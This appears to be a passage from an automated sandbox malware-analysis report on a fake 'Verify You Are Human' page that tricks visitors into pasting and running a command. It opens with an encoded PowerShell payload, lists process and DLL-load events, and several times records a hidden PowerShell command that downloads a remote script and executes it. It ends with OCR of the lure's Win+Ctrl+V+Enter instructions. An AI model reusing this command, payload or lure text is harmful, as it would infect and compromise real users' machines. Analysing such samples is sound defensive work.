HcAdwBFADAAcABlAFcARwBlAFoATQBvAE4AdABKADMARgBSADcAUwB4AHUAWQBjAHEAcwBkAGoAcwBiAGIAbQBrAGkAeABQAHoAZwBmAGoAUwBuAEoAOQBBAEYAVwBFAFkASwBMAEUAWQBZAHIATABCAEMAZQBkAFgANABkAEsAbgBJAFoARgB3AHcAYgBoAEEARABWAHMATQBPAGIAbAB1AFgAOABSAFkARQBJAGEATABPAHEATQBDAFAASAB3AEQAdQBZAHgAVABPADQAdAAyAEgAbQBsAHoARgB5AGMATQBtAEgAMQA4AGMARwB6AEoAWgBnAEkANQBzAHgAUwBuAHkAZQBmADYAbgB5AHAAdABLAGUAdgA1AEEAWAA1AFIAdwBCADQAZABrAHEARQBJAE0AZgBRAFcAMwB0AEcAQwBSAFYATQBPAHAARQA0AEcAdABpAEEAeQBtAEIANgBmADMAYwBkAHIANwBCAE0AUQBQAEcAaQBtAFkAYgBkAFIAbQBQAFYANQBBAFIAWQBoAGIAUwBnADcAegBvAEsAVAB0AE4AZwBJAEkARQBJAEgAbgBjAFoAVgAyADAANABzAE4AVQBSAGQAYgBOADkAYwBXAFcAUQBLAHUATQBwAGoAcQBtAGgAeQBtAEcAYwBRAHcAMABDADcAdQB1AFQAUQByAEcAMAAxAEYAZgAyAFgAegAgAD0AIgBEAGUAZgBsAGEAIgAgACsAIAAiAHQAZQBTAHQAcgBlAGEAbQAiADsAJABkADEATwBCAHgATAAxADcAVQAxADQANABWAFEAbABpADkAZAA5AFEATwBMADcANQB6AFQAMAAzAHgASABJAEwAYgBrAHoAZABnADkAWAA1AEEAWABjAEUAMQB4ADAAUAB1ADgAVQBRADkAVABiAG0ARQBWADkAYgBUAGEAWABGAGMATwA4ADIAeABVADcAbAB3AG4AVgBTAHMAUQAyAHMAOABFAGgAZABnAEQAaQBaAGsATwA3AFMAZwB6ADAATwBSAE4AegBTAHMAWgA3AEEAagBCAFQAWgBJAGQAOABiAFEAOABCADUAUQA2AE8AcwBSAGwAZQA2AGQASABRAGsAWgBwAEwAeQBxAHIAcABpAHUATQBtAFgAUQBSAFcAWQBGAGwAOABFAG8AbABJAFcAUQB0ADUAcABnAE0AagA2AFkAdQBwAFIAYwBEADkAeAA2AFMATQBYADEAcwBaADMAVAA1AG4ARgA5AHoANgB1AEwAbABjAEoAOQBHAEUAaQBUAFoAOQBhAFQATAA4AGYANQBxAGIAWQBMAGcAagAyAFIAeQBuADkAaQBqAE4AdABuAHgAVAByAG0AcwBRAGMAcQBnADEAVgBaAGsAUABoAFYAaABkADUAdwBvAHIATgB2AG4AMgA1AGYAWABYAE8AYQBTAHcAMQBqAFcARwBBAGsAagBkADQATAB6AHcATwBuAGwAZABwAGoARABkADEASwBTAGgAWABkADcAbwBTAFkANwBOAFAAeAB5AFUATABzADcAZwBGADkAZQBxAGMAUwBPAG4AOQAyAGYAYwBmAEkAUQB5AEYAegBLAGUAdwBhAEgAcgB4AEkAUQBvAGYATwBEAGUATABiAFkAQwB0AHEATABpAHMAYQBGAE0AYwBRAHoAQwBsAHQAawBkAG0AMwBSADkA
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://e1.foiloverturnarrival.shop/app_permissions.json'))"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe"
        Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: version.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: imgutil.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: mlang.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: slc.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32
        Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

        Data Obfuscation

        barindex
        Suspicious powershell command line found
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://e1.foiloverturnarrival.shop/app_permissions.json'))"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://e1.foiloverturnarrival.shop/app_permissions.json'))"
        Yara detected Costura Assembly Loader
        Source: Yara matchFile source: 00000014.00000002.2164204062.0000000008540000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

        Persistence and Installation Behavior

        barindex
        Detect drive by download via clipboard copy & paste
        Source: screenshotOCR Text: x e about:blank X Verify You Are Human C escoaterzone.com/play.html Verify You Are Human Please verify that you are a human to continue. I'm not a rabat Verification Steps 1. Press Windows Button 2. Press CTRL + V 3. Press Enter 15:03 ENG p type here to search SG 15/01/2025
        Source: screenshotOCR Text: x e about:blank X Verify You Are Human C escoaterzone.com/play.html Verify You Are Human Please verify that you are a human to continue. I'm not a rabat Verification Steps 1. Press Windows Button 2. Press CTRL + V 3. Press Enter 15:04 ENG p Type here to search SG 15/01/2025
        Source: screenshotOCR Text: x e about:blank X Verify You Are Human escoaterzone.com/play.html Verify You Are Human Please verify that you are a human to continue. I'm not a rabat Undo Cut Copy Verification Paste Steps Select All 1. Press Windows Right to left Reading order Run Button Show Unicode control characters Insert Unicode control character 2. Press CTRL + V Type the resource, open IME 3. Press Enter Reconversion Open: 15:04 ENG p Type here to search SG 15/01/2025
        Source: Chrome DOM: 1.1OCR Text: Verify You Are Human Please verify that you are a human to continue. I'm nat a robat Verification Steps 1. Press Windows Button 2. Press CTRL + V 3. Press Enter
